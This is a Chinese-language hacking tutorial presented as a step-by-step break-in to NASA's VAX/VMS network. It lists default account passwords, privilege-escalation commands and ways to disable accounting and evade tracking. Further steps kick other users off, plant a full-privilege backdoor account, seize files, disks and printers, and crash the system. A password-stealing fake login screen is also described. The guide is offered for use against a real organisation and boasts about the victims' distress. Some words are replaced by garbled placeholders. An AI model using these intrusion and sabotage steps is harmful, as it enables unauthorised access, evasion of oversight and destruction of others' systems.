今天我对美国太空总署的系统突然感兴趣，我想看看美国到底登上月球了吗，有没有外星人跟他们接触，天哪，这一切都是那么的神气，对我就像是一块磁铁，将我所有的激情和目光都拉上了这个地方。就是他的老巢，但是我对这个并不感兴趣，因为他一样采用的都是普通的WEB服务器。我的目标是突破它的内部网络，也就是NASA的科研核心网络。

{dy}步：登录

有两种方法可以登录VMS系统。{dy}种是正常登录，另外一种就是利用试探密码以及欺骗。我们是黑客，优秀的黑客！我们当然选择欺骗（Cheating）登陆，如果你想要成功的混进VAX系统，你可以利用两种方法：

1、用利用系统中现有的其他人的用户名和密码。
2、利用默认的密码进行欺骗进入。

1、利用其他人的密码：

这种方法既有好的一面，也有不好的一面，好的一方面是你不必新建一个帐号，或是用一个受限制的帐号，那么在这种情况下系统管理员什么都不会觉察到，坏 的一方面就是你所利用的帐号的主人可能会注意到。你想想，如果他并没有登录，但是又显示它在线，他会有什么感觉，而且会留下登陆的种种记录，并且他这个帐 号还可能没有我们所需要获得的权限。获得其他人的密码比较简单，只要你进入系统，即使只是很小的权限，那么你只要向系统管理员的机器发送一个程序，有点类 似于现在的木马或者是欺骗工具。它包含如同登录时需要的屏幕一样，那么，你就可能获得他的密码，还有用户帐号，再把这个文件从远程的打印机打印出来或是输 出到一个文件上，当然你一定记得要把这个文件删除掉。

2、利用系统的默认的密码：

在VAX系统建立时，有4个默认的用户帐号还有密码，它有可能被自修改或是删除，但是系统管理员通常有可能会遗留下一两个以备将来系统遇到麻烦的时候进行恢复工作，这4个帐号和密码分别是：

Name Password
SYSTEM MANAGER or OPERATOR
FIELD SERVICE or TEST
DEFAULT USER or DEFAULT
SYSTEST UETP or SYSTEST

我的经验告诉我，一般来说FIELD SERVICE这个帐号都会起作用。一旦我们登录了该系统，如果你想要获得{zg}的权限，你就应该输入：

$SET PROC/PRIV=ALL

‘$’是系统提示，如果你要是本身获得的权限不够，就会系统提示你不能够执行该命令，那么你就要换一个password，才能得到你想要的特权。是不是很令我们头疼？不过一般的情况下方法还是奏效的。

第二步：浏览该系统

成功的利用完{dy}步，我们已经可以顺利的在VMS系统上登陆了，下一步要做什么呢？当然是要获取更多的信息，但是首先，我们一定要确认是否能够返回，那么我们就先要这样做：

$SET ACCOUNTING/DISABLE

这将会禁止VMS系统中那个讨厌的跟踪程序对我们的跟踪，再输入：

$SHOW USERS

看一看谁在系统上，如果你看到我们自己的帐号是两个的话，赶快退出来。我们不想因为做傻事而被捉吧，但是我们一旦确认无人能够监视我们的行动，那么我们接下来就输入：

$SET LOGINS/INTERACTIVE=0

这将禁止其他人登录到这台机器上，下一步就要把其他的人踢出去。

$SHOW USERS

系统可能返回如下的信息：

VAX/VMS INTERACTIVE USERS
23-JUL-2000 09:37:15.54
Total number of interactive users= 6
Username Process Name PID Terminal
BRUNO BRUNO 0000026B TTD3:
FIELD FIELD 00000FF2 TTC2:
JOHNSON _TTD5: 0000026D TTD5:
LINCOLN LINCOLN 0000026A TTD2:
CYBERPUNK CYBERPUNK 000001D8 TTD4:
HARDCORE HARDCORE 00000263 TTC0:

现在，如果你以FIELD用户名登录的话，我们要通过验证的话，输入：

$STOP/ID=PID

这样的话，就可以显示除我们之外的用户的情况，并且把的用户踢出去，{zh0}在晚上用户少时这样做，因为如果用户管理员收到好多的控诉信息的话，他就可能会发现并捉住你。接下来，我们要确认，我们能够再次登录到这个系统上，为了能达到这一点：

$SET DEF SYS$SROOT:[SYSEXE]

这样的话，你将进入到SYS$SROOT的SYSEXE目录

下一行：

$RUN AUTHORIZE

系统返回如下信息：

UAF> - now type:
UAF> ADD WASTOID /PASSWORD=ZEDNET /UIC=[099,900] /CPUTIME=0-
/DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING
UAF> EXIT

这是什么意思呢，让我们往下做：

ADD WASTOID－加入一个记录名字叫WASTOID
/PASSWORD=ZEDNET－为新帐号加密码
/CPUTIME=0－将你的帐号的访问时间变为不限时，
/UIC=[099,900]
/DEVICE=SYS$SYSROOT－设置你的工作驱动器
/DIRECTORY=[SYSEXE]－设置你的工作目录
/PRIVS=ALL－获得{zg}的操作权限
/NOACCOUNTING－禁止系统跟踪

好了，你现在就有了所有的特权，并且有了合法的帐号，返回系统。

第三步：系统的基础

如果你从没有用过VAX系统的话，可以看一下这些提示：

HELP－将会列出所有的命令，并且能够给你详细的解释
SET DEF drive:[directory.sub1,sub2]－设置默认的工作驱动器还有工作目录
TYPE或是T－和DOS下的TYPE一样，是显示文件内容的：如T file.txt
PRINT或是PR－打印文件，如：PR file.txt
DIR或是D－显示工作目录
DIR/PRINT 或D/PRINT在屏幕和打印机上同时显示。
RUN或是R－执行.exe的可执行文件，如：r filename.exe

好了，准备的比较充分了

第四步：开工了

A、修改文件：

这个世界上最美好的事情就是剥夺他本人的文件的控制权了，当你看到他对自己的文件束手无策时，我们可能会高兴手舞足蹈。让我们偷着乐吧。
你可以用：

set protection 这个命令，如果你想一个文件只能由你自己访问，而其他的任何人都无权访问时，你可以运行

$set prot=(s:rwed,o,g,w) test.dat

你就有了xx的特权，其他的人包括文件的拥有者，工作组，以及管理员都没有权限。

B、磁盘：

你可以对整个磁盘都一次加以控制，比如你要控制驱动器：dirver1

$dismount driver1
$deallocate driver1
$set prot(s,o;r,g,w)/device/owner_vic[099,900] driver1
$allocate driver1
$mount driver1

这样你就有了一个个人控制的驱动器了。

C、打印机：

我们知道如果要打印一个文件只要输入：

$pr hacking.dat

如果运行

$stop/abort lpao

那么，系统就会停止打印机目前的工作并将它踢出队列。

$delete/queve lpao

这会将队列中所有的项目全部xx，那么打印机就是你一个人的了。

如此等等，我们只介绍几种，其他的就看你自己的了。

第五步，安全撤退

1、opccrash

如果要关闭系统的话：

$run sys$system:opccrash

系统会提示：

system shutdown complete –use console to halt system(请使用控制台来关闭系统)

输入：

^P
>>>-type:
>>>HALT
HALTED AT 8000708A

2、破坏性退出

^P
>>>HALT
>>>@CRASH

OKOK，我们已经完成了一整套对美国太空总署的行动，就让我们躲在一边偷偷看那些老外们忙活去吧，当然我们也不能忘记“正事”，这就是进入它的数据库，看看那些他们的小秘密。